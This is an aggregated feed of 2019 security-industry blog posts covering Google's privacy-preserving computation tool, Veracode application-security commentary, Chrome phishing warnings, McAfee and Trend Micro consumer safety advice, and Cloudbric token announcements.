We continually invest in new research to advance innovations that preserve individual privacy while enabling valuable insights from data. Earlier this year, we launched Password Checkup, a Chrome extension that helps users detect if a username and password they enter on a website has been compromised. It relies on a cryptographic protocol known as private set intersection (PSI) to match your login’s credentials against an encrypted database of over 4 billion credentials Google knows to be unsafe. At the same time, it ensures that no one – including Google – ever learns your actual credentials.

Today, we’re rolling out the open-source availability of Private Join and Compute, a new type of secure multi-party computation (MPC) that augments the core PSI protocol to help organizations work together with confidential data sets while raising the bar for privacy.


Collaborating with data in privacy-safe ways

Many important research, business, and social questions can be answered by combining data sets from independent parties where each party holds their own information about a set of shared identifiers (e.g. email addresses), some of which are common. But when you’re working with sensitive data, how can one party gain aggregated insights about the other party’s data without either of them learning any information about individuals in the datasets? That’s the exact challenge that Private Join and Compute helps solve.

Using this cryptographic protocol, two parties can encrypt their identifiers and associated data, and then join them. They can then do certain types of calculations on the overlapping set of data to draw useful information from both datasets in aggregate. All inputs (identifiers and their associated data) remain fully encrypted and unreadable throughout the process. Neither party ever reveals their raw data, but they can still answer the questions at hand using the output of the computation. This end result is the only thing that’s decrypted and shared in the form of aggregated statistics. For example, this could be a count, sum, or average of the data in both sets.


A deeper look at the technology 


Private Join and Compute combines two fundamental cryptographic techniques to protect individual data:

  • Private set intersection allows two parties to privately join their sets and discover the identifiers they have in common. We use an oblivious variant which only marks encrypted identifiers without learning any of the identifiers.
  • Homomorphic encryption allows certain types of computation to be performed directly on encrypted data without having to decrypt it first, which preserves the privacy of raw data. Throughout the process, individual identifiers and values remain concealed. For example, you can count how many identifiers are in the common set or compute the sum of values associated with marked encrypted identifiers – without learning anything about individuals. 

This combination of techniques ensures that nothing but the size of the joined set and the statistics (e.g. sum) of its associated values is revealed. Individual items are strongly encrypted with random keys throughout and are not available in raw form to the other party or anyone else.

Watch this video or click to view the full infographic below on how Private Join and Compute works:

Private Join and Compute

Using multi-party computation to solve real-world problems


Multi-party computation (MPC) is a field with a long history, but it has typically faced many hurdles to widespread adoption beyond academic communities. Common challenges include finding effective and efficient ways to tailor encryption techniques and tools to solve practical problems.

We’re committed to applying MPC and encryption technologies to more concrete, real-world issues at Google and beyond by making privacy technology more widely available. We are exploring a number of potential use cases at Google across collaborative machine learning, user security, and aggregated ads measurement.

And this is just the beginning of what’s possible. This technology can help advance valuable research in a wide array of fields that require organizations to work together without revealing anything about individuals represented in the data. For example:

  • Public policy - if a government implements new wellness initiatives in public schools (e.g. better lunch options and physical education curriculums), what are the long-term health outcomes for impacted students?
  • Diversity and inclusion - when industries create new programs to close gender and racial pay gaps, how does this impact compensation across companies by demographic?
  • Healthcare - when a new preventative drug is prescribed to patients across the country, does it reduce the incidence of disease? 
  • Car safety standards - when auto manufacturers add more advanced safety features to vehicles, does it coincide with a decrease in reported car accidents?

Private Join and Compute keeps individual information safe while allowing organizations to accurately compute and draw useful insights from aggregate statistics. By sharing the technology more widely, we hope this expands the use cases for secure computing. To learn more about the research and methodology behind Private Join and Compute, read the full paper and access the open source code and documentation. We’re excited to see how other organizations will advance MPC and cryptography to answer important questions while upholding individual privacy.


Acknowledgements


Product Manager - Nirdhar Khazanie
Software Engineers - Mihaela Ion, Benjamin Kreuter, Erhan Nergiz, Quan Nguyen, and Karn Seth
Research Scientist - Mariana Raykova


Live From Gartner Security & Risk Mgmt Summit: Pair Security Trainings With Technical Controls

“We often forget that technology cannot solve the world’s problems.” That was one of the opening lines of Joanna Huisman’s session “Magic Quadrant for Security Awareness Computer-Based Training” at the Gartner Security & Risk Management Summit in National Harbor, MD. While her Magic Quadrant doesn’t address DevSecOps trainings, I took away some valuable lessons that also apply to this area.

20 percent of users will never change behavior, no matter how well you train

Traditional awareness efforts are based on the belief (or hope) that information leads to action. In other words, the problem with trainings is that “awareness” does not automatically result in secure behavior: About 20 percent of learners are never going to do the right thing, no matter how much you train them.

Let’s think this through for a moment: 80 percent of your audience will follow your advice to some extent, so you will get an improvement, but 20 percent will not change their behavior. Most security professionals aim to reward users who follow security process but are reluctant to punish the ones who don’t because they don’t want to be the bad guys. Even if they are prepared to go through with punitive actions, it may be counter to corporate culture (and generally not a good teaching practice).

Education is good, but it must be coupled with technical controls

This means that while security awareness does improve your security posture, you still need technical controls in place to mitigate the rest. In the case of DevSecOps, this translates into a combination of secure coding trainings and automated application security testing. The training will reduce vulnerabilities being introduced into the code, which reduces the cost of your DevSecOps program because security defects that never enter the code are understandably much cheaper than those found in production. The security testing serves as a feedback loop for developers and as a gate to stop security defects escaping to production.

At Veracode, we offer courses to teach the fundamentals of secure coding, both as eLearning and live sessions. With Veracode Greenlight, we provide instant feedback on code security as developers are typing code in their IDE. And we provide feedback via ticketing systems and a security gate as part of Veracode Static Analysis. If developers get stuck fixing a vulnerability, they can book our application security consultants for a coaching session to help fix their security defect.

Learn more about Veracode’s Developer Training.

Application Security Beyond Static Analysis

There is no application security “silver bullet” – it takes a combination of testing types to effectively reduce your risk. Each testing method has a different role to play and works best when used in harmony with others.

For instance, our research showed that there are significant differences in the types of vulnerabilities you discover dynamically at runtime compared to those you’ll find when doing static testing in a non-runtime environment. In fact, two of the top five vulnerability categories we found during dynamic testing weren’t even among the top five found by static, with one not found by static at all.

Add to this the fact that applications are increasingly “assembled” from open source components, rather than developed from scratch, which means software composition analysis is an important part of your testing mix. Neglecting to assess and keep track of the open source components you are using would leave a large portion of your code exposed and leave you open to attack. 

And finally, automation alone is not enough to ensure an application is thoroughly tested from a security perspective. Some flaws, such as CSRF (Cross-Site Request Forgery) and business logic vulnerabilities, require a human to be in the loop to exploit and verify the vulnerability. Only manual penetration testing can provide positive identification and manual validation of these vulnerabilities.

Here's an overview of the different types of vulnerabilities found by different testing types:

capabilities static analysis software composition analysis dynamic analysis manual penetration testing
Flaws in custom web apps (CWEs) X   X X
Flaws in custom non-web apps (CWEs) X     X
Flaws in custom mobile apps (CWEs) X     X
Known vulnerabilities in open source components (CVEs)   X   X(1)
Behavioral issues (CWEs) X(2)     X
Configuration errors (CWEs)     X X
Business logic flaws (CWEs)       X
Repeatable process for automation X X X  
Scalable to all corporate applications X X X  
Scan speed Seconds to hours Seconds to minutes Hours Days to weeks
Cost per scan $ $ $ $$

1Penetration testing can find known vulnerabilities in open source components, but this may not be as rigorous as Veracode Software Composition Analysis, which not only systematically flags CVEs but also crawls commit histories and bug tracking tickets in open source projects to identify silent fixes of security issues.

2This is not true for all static analyzers. Veracode can exercise the code and manipulate the UI for behavioral analysis in mobile applications.

Here’s a summary of when to use each testing type:

assessment type advantages limitations
Static analysis (with entire application in scope)
  • Very broad coverage of flaw types (CWEs)
  • Looks at the flaws in the context of the entire application, analyzing all the data paths
  • Can scan any type of application, including web, mobile, desktop, or microservices
  • Scanning frequency should be in line with how often developers can review scan results
  • Use static analysis as part of Continuous Delivery pipeline and file security issues in bug tracking system
  • Can track flaw history: new, open, fixed. Important for trending reports on mean time to remediation.
  • Suitable for compliance purposes
  • Does not provide instant feedback to developers as they’re coding
  • Cannot find CWEs related to server configurations
  • Limited to code that developers can remediate.
  • Does not report vulnerabilities in third-party components (see: SCA).

Static analysis (on file level, e.g., Greenlight)

  • Recommended for development teams who want to shift left in application security testing by scanning early and often. Scans usually complete in seconds.
  • Best suited when scanning multiple times per day
  • Recommended for use by developers working on the new code for continuous flaw feedback and remediation guidance
  • Developer friendliness: enhances learning, allows developers to find and address issues without exposing flaws in reports
  • Scans web applications without having to integrate with the SDLC
  • Ability to scan in pre-production and production
  • Suitable for compliance purposes
  • Scans individual files, so can only detect vulnerabilities where source and sink are in same file
  • Typically not suited for compliance scanning because scope limitations may cause false negatives
  • Does not report vulnerabilities in third-party components
Dynamic analysis
  • Scans web applications without having to integrate with the SDLC
  • Ability to scan in pre-production and production
  • Suitable for compliance purposes
Scan times are often between 12 and 24 hours for complex applications, so recommended for overnight scans, or for asynchronous scanning

Software composition analysis

 

  • Finds vulnerabilities in third-party components
  • Scans take seconds or minutes Can scan any type of application, including web, mobile, desktop, or microservices
  • Suitable for compliance purposes
Does not find flaws in first-party code

 

For more details, check out our new guide, Application Security Best Practices.

New Chrome Protections from Deception


Chrome was built with security in mind from the very beginning. Today we’re launching two new features to help protect users from deceptive websites. The Suspicious Site Reporter Extension will improve security for Chrome users by giving power users an easy way to report suspicious sites to Google Safe Browsing. We’re also launching a new warning to protect users from sites with deceptive URLs.

We designed Chrome to be secure by default, and easy to use by everyone. Google Safe Browsing has helped protect Chrome users from phishing attacks for over 10 years, and now helps protect more than 4 billion devices every day across multiple browsers and apps by showing warnings to people before they visit dangerous sites or download dangerous files. We’re constantly improving Safe Browsing, and now you can help.

Safe Browsing works by automatically analyzing the websites that we know about through Google Search’s web crawlers, and creating lists of sites that are dangerous or deceptive. With the Suspicious Site Reporter extension, you can help Safe Browsing protect web users by reporting suspicious sites. You can install the extension to start seeing an icon when you’re on a potentially suspicious site, and more information about why the site might be suspicious. By clicking the icon, you’re now able to report unsafe sites to Safe Browsing for further evaluation. If the site is added to Safe Browsing’s lists, you’ll not only protect Chrome users, but users of other browsers and across the entire web.


Help us protect web users by reporting dangerous or deceptive sites to Google Safe Browsing through the Suspicious Site Reporter extension.

One way that deceptive sites might try to trick you is by using a confusing URL. For example, it’s easy to confuse “go0gle.com” with “google.com”. In Chrome 75, we’re launching a new warning to direct users away from sites that have confusing URLs.


Starting in the current version of Chrome (75), you’ll see a warning when the page URL might be confused for URLs of sites you’ve visited recently.

This new warning works by comparing the URL of the page you’re currently on to URLs of pages you’ve recently visited. If the URL looks similar, and might cause you to be confused or deceived, we’ll show a warning that helps you get back to safety.

We believe that you shouldn't have to be a security expert to feel safe on the web, and that many Chrome power-users share our mission to make the web more secure for everyone. We’ll continue improving Chrome Security to help make Chrome easy to use safely, and are looking forward to collaborating with the community to further that goal. If you'd like to help out, install the new extension and start helping protect the web!

Can All-in-One Printers Be Hacked? “Hackable?” Sets the Fax Straight

The heyday of fax technology may have been in the 80s, but all-in-one printers found throughout homes and offices often still include a fax machine. And telephonic transmission has resisted the rise of email and other internet-connected messaging tools in a variety of fields, including healthcare and law enforcement.

On the latest episode of “Hackable?” we learn if this dated, but still used, technology puts entire networks at risk. Geoff invites two Israeli cybersecurity researchers to test the seldom-used fax machine and printer sitting in the corner of his home office. Listen and learn what they are able to do with only a $5 modem, Geoff’s fax number, and a Python script.

The post Can All-in-One Printers Be Hacked? “Hackable?” Sets the Fax Straight appeared first on McAfee Blogs.

Can All-in-One Printers Be Hacked? “Hackable?” Sets the Fax Straight

The heyday of fax technology may have been in the 80s, but all-in-one printers found throughout homes and offices often still include a fax machine. And telephonic transmission has resisted the rise of email and other internet-connected messaging tools in a variety of fields, including healthcare and law enforcement.

On the latest episode of “Hackable?” we learn if this dated, but still used, technology puts entire networks at risk. Geoff invites two Israeli cybersecurity researchers to test the seldom-used fax machine and printer sitting in the corner of his home office. Listen and learn what they are able to do with only a $5 modem, Geoff’s fax number, and a Python script.

The post Can All-in-One Printers Be Hacked? “Hackable?” Sets the Fax Straight appeared first on McAfee Blogs.

Live From Gartner Security & Risk Mgmt Summit: Running Midsize Enterprise Security

Over the past few months, I’ve experienced an increased interest in DevSecOps from midsize enterprises, so I was especially interested in attending Neil Wynne and Paul Furtado’s session “Outlook for Midsize Enterprise Security and Risk Management 2019” at the Gartner Security & Risk Management Summit in National Harbor, MD this week.

57 Percent of Midsize Enterprises Don’t Have a CISO

Gartner defines midsize enterprises as companies with less than $20 million in IT security budget. At that size, they have up to 30 people in IT, which means that 57 percent of this group do not have enough security staff to warrant a CISO. This means the CIO is accountable for cybersecurity in most midsize enterprises.

According to Gartner, midsize enterprises spend an average of $1,089 on IT security per employee. About 6 percent of the IT headcount is dedicated to security, so you have to have at least 17 people in IT before you start dedicating a full headcount to security. Below that water mark, it’s only partial headcounts. That’s a lot of security areas to cover for very little headcount, and you can completely forget about 24/7 coverage for security operations. To make things worse, the midsize enterprise is hit even harder by the InfoSec skill gap because they often cannot compete with Fortune 500 salaries and benefits.

How Can Midsize Enterprises Address These Challenges?

Paul Furtado, Sr. Director Analyst at Gartner, recommends the following guidelines for addressing these challenges:

  • Create a baseline: What are you doing today?
  • Know what to protect: You won’t know what to protect if you don’t know what’s critical to the business. Identify your most critical data: PII, IP, partner/customer lists, business-critical applications. If you don't know that, you're spending money in the wrong areas.
  • Know your risk appetite: Categorize all risks by business impact and risk scenario likelihood, then prioritize and decide what’s a level of acceptable risk for the organization.
  • It’s a combined effort: Security is a combination of people, process, and technology.
  • Apply best practices: You are not the first one to set up a security program – learn from others.  

Framing Security Spending With Executive Leadership

Before Paul joined Gartner, he spent decades working in the trenches in midsize enterprises. Most executive leaders ask why they should be spending dollars on security. I loved his response: “I’m not taking a dollar from you, I’m protecting the dollars for you” This is a great mind shift that I can absolutely see working with executives.

I also liked how he boiled down the basics of what a security program must do:

  • Keep bad guys out 
  • Let good guys in
  • Keep the wheels on

I often see security professionals over-rotate on the first item, which is most important to them. However, let’s not forget, items two and three are more important to everyone else in the business!

Be Pragmatic and Don’t Do Everything In-House

With very limited resources, you cannot do everything in-house. You need to outsource some of the work to be successful. Use cloud solutions and vendors that can supply you with specialized knowledge and round-the-clock coverage. As Paul summed it up: “We could do this ourselves, but it’s not a good use of our people.”

A Recipe for a Successful Security Program in Midsize Enterprise

Paul summed up his recommendations as follows:

  • Do the simple things well. This means the more difficult things in IT security become easier. Complexity is the enemy of security. 
  • Start to seriously examine how to leverage your security spending with multiplication platforms.
  • Demand a secure development life cycle and “built-in” security for IT components.
  • Constantly re-evaluate your risk tolerance and your good-enough security comfort level.
  • Investigate emerging security services.

Of course, working in application security, number three resonated most with me, so I’d like to dig into this one a little and tie it back to all of his recommendations.

How to Do DevSecOps in Midsize Enterprises

Key takeaways from Paul’s talk are that you cannot do everything in-house because of lack of headcount and skills shortage in InfoSec. Veracode can help you address both of these challenges.

Let’s get to lack of headcount first. Veracode is the only SaaS-native Leader in the Gartner 2019 Magic Quadrant for Application Security Testing, and we have been a Leader for six times in a row. As a midsize enterprise, you don’t have the time to set up and maintain an application security scanning infrastructure, especially if you have to support multiple geographic sites as well as high availability and scalability for critical DevOps teams. Using Veracode is like having DevSecOps on tap: You don’t have to set up any infrastructure so your developers can start scanning on day one.

Now let’s discuss skills shortage. If you only have a couple of InfoSec people on your team, you will struggle to offer specialized knowledge for developers who need help remediating specific vulnerabilities in their code, especially if your team covers a broad set of languages. At Veracode, we have a dedicated team of application security consultants that your developers can tap into to get help with their code. In addition, our security program managers can onboard your scrum teams onto our platform and help them automate the security scanning.

Security as a Competitive Advantage

As a midsize enterprise, you are often subject to security scrutiny when selling to the Fortune 500, especially when the value you deliver to your customers involves software, either directly or indirectly. Veracode is the only application security testing vendor to offer the Veracode Verified Program, which helps you show your customers that you take security seriously. Many of our midsize enterprise customers even use their Veracode Verified logo as a competitive advantage. Check out some of these companies in the Veracode Verified Directory.

 

“You may not have the need today, but it’s well worth doing the research today.”

How the Huawei ban could become a security threat | TECH(feed)

We’ve already talked about how the Huawei ban may affect business, but how will it affect security? Google has already warned of security threats should the company be unable to send updates to Huawei’s Android-powered devices. And even if Huawei responds with its own OS, will people trust it? In this episode of TECH(feed), Juliet discusses those security implications and what some people think the U.S. should do instead.

How Veracode Supports DevSecOps Methodologies With SaaS-based Application Security

Veracode Kuppinger Cole Report

Most legacy applications were not developed with security in mind. However, modern businesses and organizations are continuing to undergo digital transformation in order to pursue new business models and revenue channels, as well as giving their customers or constituents a simplified experience. This often means selecting cloud-based tools and solutions that allow for the scalability necessary to provide applications and services to a broad customer base.

For example, in 2013, the UK government adopted a Cloud First, or Cloud Native, policy for all technology decisions, making it mandatory to consider cloud solutions before alternatives. This means that government IT professionals must first consider public cloud options, including SaaS models for enterprise IT and back-office functions, as well as Infrastructure as a Service and Platform as a Service.

But this dramatic expansion of the application layer introduces new security challenges. In one engagement, Veracode worked with a High Street bank to secure its web application portfolio and uncovered 1,800 websites that had not been inventoried – making its attack surface 50 percent bigger than originally thought.

With the growing complexity of IT infrastructures and a shortage of qualified security experts, businesses and government agencies alike need to enlist application security specialists with a deep understanding of the complexity of modern applications.

Veracode pioneered static binary analysis to address the security of modern applications, which are often comprised from different teams, languages, frameworks and third-party libraries. This approach allows security and development teams to assess the security posture of entire applications once they’ve been built, rather than analyzing individual pieces of source code and missing some of the potential “cross-platform” exploits.

Yet the Veracode Platform offers so much more than its signature static binary analysis.

“With a growing number of integrations with CI/CD tools and development environments and expanding its coverage to the full software supply chain, Veracode clearly shows the commitment to fully embrace the modern DevOps and DevSecOps methodologies and to address the latest security and compliance challenges,” writes KuppingerCole Lead Analyst Alexei Balaganski. “With the SaaS approach, the company can ensure that customers can start using the platform within hours, and a wide range of support, consulting and training services means they are ready to guide every customer towards the application security best practices as quickly as possible.”

To learn more about our approach to supporting modern DevOps and DevSecOps methodologies, and how the Veracode Platform is even easier for software developers to use, download the KuppingerCole Report, Executive View: Veracode Application Security Platform.

The 2019 Job Seeker & The Cybersecurity Skills Shortage

In today’s ever-changing job market, job seekers and employers alike are under a great deal of pressure. Those looking for their next career move are focusing on what’s required to land a great role with competitive compensation and room for growth in an exciting field. And employers are seeking a rising star that will be a good culture fit and have values that match those of their company.

A Letter to Jobseekers

Whether you just graduated college, left your previous role, or are seeking a different career path, you’re probably thinking, “Now what?” No matter where your path leads you, stay positive. Try to find a company that invests in you, truly wants you to succeed, fosters both personal and professional growth, and makes a big difference in your career progression.

If you’re a problem solver and love to learn, cybersecurity is the path for you. A career in cybersecurity can be very fulfilling. As cybercrime continues to rise, so will the demand for qualified cybersecurity professionals, offering both dynamic growth opportunities and job security. Furthermore, cybersecurity professionals are generally among the most highly-compensated technology workers—and as the need for security professionals further outpaces the supply, salaries will continue to climb as companies compete for top talent Lastly, a career in cybersecurity offers the sense of purpose that comes with making the world a better place by helping protect innocent people from cybercriminals.

Whether you are just out the gate or further along in your career, check out McAfee CHRO Chatelle Lynch’s five powerful career tips: stay hungry, celebrate other’s success, work hard, own your brand, and take pride in everything you do.

Good luck!

A Sustainable Model for Cybersecurity Talent

The term “skills shortage” is all too familiar to those in the cybersecurity industry. A Cybersecurity Ventures report estimates there will be 3.5 million unfilled cybersecurity jobs by 2021. And as cloud platforms demand an increasingly complex set of cloud SecOps skills, the skills gap will continue to grow at an increasing clip.

Success requires fresh thinking and fresh perspectives. It’s time for the cybersecurity industry to redefine the minimum credentials for entry-level cybersecurity jobs and accept non-traditional sources of education. Instead of expecting to hire an experienced cybersecurity professional, more companies should consider accepting job applicants that will require upfront investment and training. According to our Winning the Game report, 92% of cybersecurity managers say gamers possess skills that make them suited to a career in cybersecurity—and 75% would consider hiring a gamer even if that person had no cybersecurity training or experience.

In order to grow security talent and close the skills gap, companies should also consider developing apprenticeship programs, investing and supporting cybersecurity and threat intelligence programs at universities, and other avenues. According to Lynch, “We won’t close our skills gap overnight, but by working together to collectively promote and advocate for a career in cybersecurity, the closer we will get.” We look forward to solving the cyber skills shortage together and driving innovation with diversity and inclusion.

Looking for a career in cybersecurity? Join our team.

The post The 2019 Job Seeker & The Cybersecurity Skills Shortage appeared first on McAfee Blogs.

Hackers Are After Your Personal Data – Here’s How to Stop Them

Our lives are increasingly digital. We shop, socialize, communicate, watch TV and play games — all from the comfort of our desktop, laptop, or mobile device. But to access most of these services we need to hand over some of our personal data. Whether it’s just our name and email address or more sensitive information like Social Security and credit card numbers, this sharing of what’s known as personally identifiable information (PII) exposes us to risk. Why? Because hackers are looking for ways to steal and monetize it.

The latest FBI Internet Crime Complaint Center (IC3) report, recently released, paints an accurate picture of the scale of these online threats. Personal data breaches were among the top the reported cybercrimes in 2018, with 50,642 victims listed. They were linked to losses of over $148.8m. This is likely just the tip of the iceberg, as many incidents aren’t reported. Identity theft, which usually results from data theft, cost victims over $100m last year. And phishing attacks, which are commonly used to trick victims into handing over sensitive PII and passwords, accounted for over $48m in losses.

The message is clear: consumers need to take urgent steps to protect their most sensitive identity and financial data from online attackers. That’s why Trend Micro has produced this guide, to help you identify where your most sensitive data is stored, how attackers might try to steal it and how best to secure it.

What is at risk?

The bottom line is that hackers are out to make money. Although they can do this via online extortion and ransomware, it is most commonly done via data theft. Once they have your PII and financial details they sell it on dark web sites for fraudsters to use in follow-on identity fraud. They could use banking log-ins to hijack your bank account and drain it of funds. Or they could open new credit cards in your name and run up huge debts.

Identity fraud is a growing threat to US consumers. It affected 14.4m of us in 2018, leading to losses of $1.7bn — more than double the 2016 figure.

As we’ve mentioned, the hackers are after as much PII as they can get their hands on. The more they have, the easier it is for them to stitch together a convincing version of your identity to trick the organizations you interact with online. It could range from names, addresses and dates of birth at one end to more serious details like Social Security numbers, bank account details, card numbers, and health insurance details at the other.

Most of this information is stored in your online accounts, protected by a password, so they will often put a great deal of effort into guessing or stealing the all-important log-ins. Even accounts you might not think would be of interest to a hacker can be monetized. Access to your Uber account, for example, could be hijacked and sold online to offer free trips to the buyer. Or your Netflix account log-ins may be sold to provide free streaming services to whoever pays for them.

Now, hackers may go after the firms directly to steal your personal data. In the past we’ve seen mega breaches at the likes of Uber (affecting 57m global users) and Yahoo (affecting 3bn users). But they might also target you individually. Sometimes they may use information they already know about you to trick you via phishing into handing over more, as with tax fraud and sextortion blackmail attempts, and sometimes they might use already breached passwords to try and hack into your accounts, hoping you reuse the same log-ins across multiple sites.

While you’re most likely to get reimbursed by your bank eventually for financial losses stemming from identity fraud, there’s a major impact beyond this. Online data theft and the fraud that follows could lead to:

  • Out-of-pocket costs to recover your identity
  • Emotional distress: 75% of victims report suffering severe distress
  • Lower credit scores
  • Time and effort disputing charges/recouping money: it’s estimated to take an average of six months and 200 hours of work to recover your identity following an attack.

How do they steal it?

There are plenty techniques the bad guys have at their disposal to part you from your data and money. They’re supported in this by a vast underground cybercrime economy, facilitated by those dark web sites. This not only offers a readymade platform for them to sell their stolen data to fraudsters, but also provides them with hacking tools, advice and cybercrime services. This black market economy could be worth as much as $1.5tr per year.

The hackers may choose to:

  • Target you with a phishing scam, spoofing an email to appear as if sent from an official company (the IRS, your bank, insurer, ISP etc.)
  • Launch automated attacks, either using your log-ins from other sites that have been stolen, or else using online tools to try multiple combinations of easy-to-guess passwords like “passw0rd”
  • Exploit vulnerabilities on the websites you visit to gain access to your account
  • Infect legitimate-looking mobile apps with malware and wait until you unwittingly download
  • Intercept your private data sent over public Wi-Fi: for example, if you log-in to your online banking account on public Wi-Fi, a hacker may be able to monitor everything you do.

How can I secure it?

The good news is that there are plenty of simple things you can do to keep your data safe and secure — most of them free of charge. Consider the following:

  • Use a long, strong and unique password for each website and application. To help you do this, use an online password manager to store and recall these log-ins when needed.
  • Change your passwords immediately if a provider tells you your account may have been breached
  • Use two-factor or multi-factor authentication (2FA/MFA) MFA if available for added log-in security.
  • Only enter PII into sites which start with “HTTPS” in the address bar.
  • Don’t click on links or open attachments in unsolicited emails or texts.
  • Be careful about over-sharing personal and financial details on social media.
  • Only download apps from official app stores like the Apple App Store or Google Play.
  • Don’t access any sensitive accounts (banking, email etc) on public Wi-Fi without using a VPN.
  • Invest in good AV from a trusted provider for all your PCs and mobile devices. It should include anti-phishing and anti-spam.
  • Keep all operating systems and apps on the latest versions to minimize the number of vulnerabilities hackers could target.
  • Keep tabs on your financial transactions so you can quickly spot if an identity fraudster has been impersonating you.
  • In the advent of a breach involving your credit (aka Equifax), check your credit report and security status from Equifax, TransUnion, Experian, and Innovis and put a security freeze on it if necessary.

The post Hackers Are After Your Personal Data – Here’s How to Stop Them appeared first on .

[Results] CLB Super Holder Event

Greetings Cloudbric community!

Thank you for your interest in our CLB Super Holder event which has now come to an end.

On exactly June 17, at 4pm KST, the price of CLB sat at 10.4 KRW (approx. $00.0088 USD).

As mentioned, all eligible CLB holders will receive a guaranteed minimum of 5% cumulative bonus distributions (CLB and CLBK tokens) of their total CLB stake as long as they hold the minimum CLB token amount.

Please check the airdrop list and look to see if your email was accepted in alignment with the guidelines.

Airdrop list

Please note that users that had already transferred CLB tokens prior to June 11th, 2019 at 2pm KST will receive an additional 200 CLB bonus airdrop to help mitigate any issues or confusion regarding wallet addresses and transfers.

The winners of the CLB Super Holder event will be issued their CLB tokens by June 24 and will receive their CLBK tokens after Klaytn’s main net launch. More details soon to come.


Make sure to follow us on our social media platforms (LinkedInTwitter, and Facebook) and our recently opened Telegram Announcement Channel for the latest updates!

The post [Results] CLB Super Holder Event appeared first on Cloudbric.

How to Book Your Next Holiday Online and NOT Get Scammed

Taking our tribe on an annual family holiday has always been a top priority for my husband and me. But with 4 sons – who all eat like ridiculous amounts – this can be an expensive exercise. So, like most people, I am always on the lookout for deals and ways to save money to our favourite holiday destinations.

But according to research from McAfee, our need to secure a great deal to a hot destination may mean we are cutting corners and taking risks online. Over one-third of us (32%) report that we are likely to use a website we have never heard of before just because it offers great deals!

And cybercriminals are fully aware of this, so they spend a lot of time and effort creating malicious travel websites and fraudulent links to lure us ‘travel nuts’ away from the reputable online travel players. Their goal is to get us to their fraudulent site, install malware on our devices so they can steal our personal information, passwords and, ideally, our money!

How Many Aussies Have Been Scammed?

McAfee’s research also shows that 1 in 5 of us have either been scammed or nearly scammed when booking a holiday online with many of us (32%) signing up for a deal that turned out to be fake. And horrifyingly, 28% of holiday scam victims only realised that they had been scammed when checking-in to their holiday accommodation!! Can you imagine breaking the news to the kids? Or worse still having to pay twice for the one holiday?

Cybercriminals Also Have Favourite Holiday Hot Spots

Not only are cybercriminals capitalising on our need for a deal when booking a holiday, but they are also targeting our favourite destinations. The findings from McAfee’s research show holiday hot spots such as Thailand, India, the Philippines and the UK generate the riskiest search results when people are on the hunt for holidays online.

The top holiday destinations for Aussies that hackers are targeting via potentially malicious sites:

  1. New Delhi, India
  2. Bangkok, Thailand
  3. London, England
  4. Phuket, Thailand
  5. Manila, Philippines

Cybercriminals take advantage of the high search volumes for accommodation and deals in these popular destinations and drive unsuspecting users to their malicious websites often using professional looking links, pop-up ads and even text messages.

What You Can Do to Avoid Being Scammed

With Aussie school holiday just a few weeks away, do not despair! There are definitely steps you can take to protect yourself when booking your Winter getaway. Here are my top tips:

  1. Think Before You Click

With 25% of holiday bookings occurring through email promotions and pop-up ads, it’s essential to properly research the company behind the ads before you proceed with payment. Check out reviews and travel forums to ensure it is a legitimate online travel store. And it’s always best to use a trusted online retailer with a solid reputation even if it costs a little more.

  1. Use Wi-Fi With Caution

Using unsecured Wi-Fi is a risky business when you are travelling. If you absolutely must, ensure it is secured BUT never conduct any financial or sensitive transactions when connected. Investing in a virtual private network (VPN) such as McAfee Safe Connect is the best way to ensure that your connection is secure and your data remains private.

  1. Protect Yourself

Ensuring your device has current comprehensive security protection, like McAfee Total Protection, will ensure any malicious websites will be identified when you are browsing. It will also protect your device against malware – which could come in handy if you are tricked into visiting a fraudulent site.

So, next time you come across an amazing, bargain-basement deal to Thailand, PLEASE take the time to do your homework. Is the retailer legitimate? What do the reviews say? What are the terms and conditions? And, if it isn’t looking rosy, remember, if it looks too good to be true, it probably is!

‘till next time

Alex xx

 

The post How to Book Your Next Holiday Online and NOT Get Scammed appeared first on McAfee Blogs.

[Exchange Listing] CLB Token to be listed on Bitsdaq Exchange

Bitsdaw exchange listing CLB

The Cloudbric team is excited to announce that we will be adding a new exchange listing for our CLB token!

Bitsdaq exchange is an official partner of Bittrex, which is one of the premier cryptocurrency exchanges based out of the US.

Based on Bittrex’s unique exchange technology, Bitsdaq will help provide safe and reliable cryptocurrency trading activities for users based in the APAC region.

Users can also find Cloudbric’s CLB token listed on both Korea-based Bitsonic exchange, as well as BitForex which is targeted for global users.

Bitsdaq listing details:

  • Token: CLB
  • Exchange: Bitsdaq
  • Date: June (exact date will be announced on our Telegram)

For more information regarding our CLB token and new exchange listing announcements, please join our official Telegram community channel at https://t.me/cloudbric.

_____________________________

What is Bitsdaq?

Bitsdaq is a Hong Kong based cryptocurrency exchange based on the unique technology of its official partner, Bittrex exchange. Bitsdaq officially launched its exchange on January 29th, 2019 and currently boasts more than 2 million users with both mobile and web access for its exchange.

As an official partner of Bittrex exchange, one of the most globally recognized cryptocurrency exchanges, Bitsdaq helps expand Bittrex’s reach towards the APAC region through its unique and cutting edge technology.


Make sure to follow us on our social media platforms (LinkedInTwitter, and Facebook) and our recently opened Telegram Announcement Channel for the latest updates!

The post [Exchange Listing] CLB Token to be listed on Bitsdaq Exchange appeared first on Cloudbric.

5 Digital Risks to Help Your Teen Navigate this Summer

S’mores.
Sparklers.
Snow cones.
Sunburns.
Fireflies.

Remember when summer was simple? Before smartphones and social networks, there was less uploading and more unwinding; less commenting and more savoring. 

There’s a new summer now. It’s the social summer, and tweens and teens know it well. It’s those few months away from school where the pressure (and compulsion) to show up and show off online can double. On Instagram and Snapchat, it’s a 24/7 stream of bikinis, vacations, friend groups, and summer abs. On gaming platforms, there’s more connecting and competing. 

With more of summer playing out on social, there’s also more risk. And that’s where parents come in. 

While it’s unlikely you can get kids to ditch their devices for weeks or even days at a time this summer, it is possible to coach kids through the risks to restore some of the simplicity and safety to summer.

5 summer risks to coach kids through:

  1. Body image. Every day your child — male or female — faces a non-stop, digital tidal wave of pressure to be ‘as- beautiful’ or ‘as-perfect’ as their peers online. Summer can magnify body image issues for kids.
    What you can do: Talk with your kids about social media’s power to subtly distort body image. Help kids decipher the visual world around them — what’s real, what’s imagined, and what’s relevant. Keep an eye on your child’s moods, eating habits, and digital behaviors. Are comments or captions focused only on looks? If so, help your child expand his or her focus. Get serious about screen limits if you suspect too much scrolling is negatively impacting your child’s physical or emotional health.
  2. Gaming addiction. The risks connected with gaming can multiply in the summer months. Many gaming platforms serve as social networks that allow kids to talk, play, and connect with friends all day, every day, without ever leaving their rooms. With more summer gaming comes to the risk for addiction as well as gaming scams, inappropriate content, and bullying.
